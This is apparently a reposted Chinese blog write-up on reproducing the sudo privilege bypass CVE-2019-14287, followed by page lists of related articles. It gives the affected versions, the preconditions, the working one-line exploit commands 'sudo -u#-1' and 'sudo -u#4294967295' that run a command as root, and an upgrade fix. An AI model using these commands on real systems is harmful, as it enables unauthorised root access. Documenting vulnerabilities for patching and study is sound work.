sudo权限绕过漏洞复现（CVE-2019-14287）

其他 2020-07-23 09:46:12 阅读次数: 0

前言

sudo 是所有 unix操作系统(BSD, MacOS, GNU/Linux) 基本集成的一个用户权限控制/切换程序。允许管理员控制服务器下用户能够切换的用户权限

CVE-2019-14287 是管理员在配置文件中用了 ALL 关键词后造成的。

影响版本

sudo < 1.8.28

利用条件

1、sudo -v < 1.8.28

2、知道当前用户的密码

3、当前用户存在于sudo权限列表

我们来看一下/etc/sudoers

漏洞复现

sudo -u#-1 id -u

or

sudo -u#4294967295 id -u

修复建议

升级sudo到最新版

猜你喜欢

转载自blog.csdn.net/xuandao_ahfengren/article/details/106958802

PJzhang:CVE-2019-14287 sudo权限绕过漏洞复现

CVE-2019-14287 sudo权限绕过漏洞复现

CVE-2019-14287：sudo 权限绕过漏洞（复现过程）

CVE-2019-14287：sudo 权限绕过漏洞复现

sudo权限绕过漏洞复现（CVE-2019-14287）

linux sudo root 权限绕过漏洞(CVE-2019-14287)

linux sudo root 权限绕过漏洞(CVE-2019-14287)复现

CVE-2019-14287 (Linux sudo命令)漏洞复现

四、Linux sudo root 权限绕过漏洞(CVE-2019-14287)

【漏洞测试】SUDO：CVE-2019-14287

Sudo漏洞分析(CVE-2019-14287)

CVE-2019-14287 漏洞复现

10.16Maccms后门分析、Sudo提权漏洞（CVE-2019-14287）复现

[提权]sudo提权复现(CVE-2019-14287)

CVE-2019-14287 sudo 配置不当-权限提升漏洞预警

linux CVE-2019-14287 Sudo提权漏洞

CVE-2019-14287 sudo提权漏洞分析

sudo提权漏洞，附payload(CVE-2019-14287)

sudo提权漏洞(CVE-2019-14287)

（CVE-2019-14287）sudo提权漏洞

CVE-2019-14287(sudo提权)

CVE-2019-14287_sudo权限提升

源码安装sudo-1.8.31,解决CVE-2019-14287(sudo提权)问题

复现Openfire 权限绕过漏洞（CVE-2023-32315）

（CVE-2021-3156）Linux sudo权限提升漏洞复现

Linux sudo权限提升漏洞（CVE-2021-3156）复现

Linux sudo权限提升漏洞复现(CVE-2021-3156)

利用Vulnhub复现漏洞 - Couchdb 垂直权限绕过漏洞（CVE-2017-12635）

Couchdb_垂直权限绕过漏洞 CVE-2017-12635 漏洞复现

【vulhub】Couchdb 垂直权限绕过漏洞（CVE-2017-12635）漏洞复现

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

让自己的头脑极度开放

CentOS 6.5(x64) 和Redhat6.5操作系误删libc

高可用注册中心

【日记】12.28/【题解】AtCoder AGC041

XML（5）_XML 约束_DTD

Java集合Map（四）

树梅派安装桌面环境教程

pipenv 的使用和安装

小程序白屏问题和内存研究

C语言简单选择排序

每日归档

更多

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)